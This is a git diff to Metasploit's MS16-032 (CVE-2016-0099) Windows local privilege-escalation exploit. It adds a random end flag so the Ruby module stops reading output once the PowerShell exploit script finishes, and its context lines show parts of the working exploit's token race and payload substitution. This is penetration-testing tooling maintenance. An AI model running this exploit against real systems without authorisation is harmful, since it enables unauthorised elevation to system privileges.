diff --git a/data/exploits/CVE-2016-0099/cve_2016_0099.ps1 b/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
index 1a495b993e..74be4b236f 100755
--- a/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
+++ b/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
@@ -354,6 +354,7 @@
 			$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
 			$StartTokenRace.Stop()
 			$SafeGuard.Stop()
+			echo "$end"
 			Return
 		}
 			
diff --git a/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb b/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
index 3dc3a190ea..dc9190c7f4 100644
--- a/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
+++ b/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
@@ -126,6 +126,8 @@ class MetasploitModule < Msf::Exploit::Local
     ms16_032.gsub!("$cmd","\"#{cmdstr}\"")
     #lpcommandLine - capped at 1024b
     ms16_032.gsub!("$args1","\"#{psh_cmd}\"")
+    end_flag = Rex::Text.rand_text_alphanumeric(32)
+    ms16_032.gsub!("$end", end_flag)
 
     print_status('Compressing script contents...')
     ms16_032_c = compress_script(ms16_032)
@@ -160,6 +162,7 @@ class MetasploitModule < Msf::Exploit::Local
 
       while(d = r.channel.read)
         print(d)
+        break if d.include? end_flag
       end
       r.channel.close
       r.close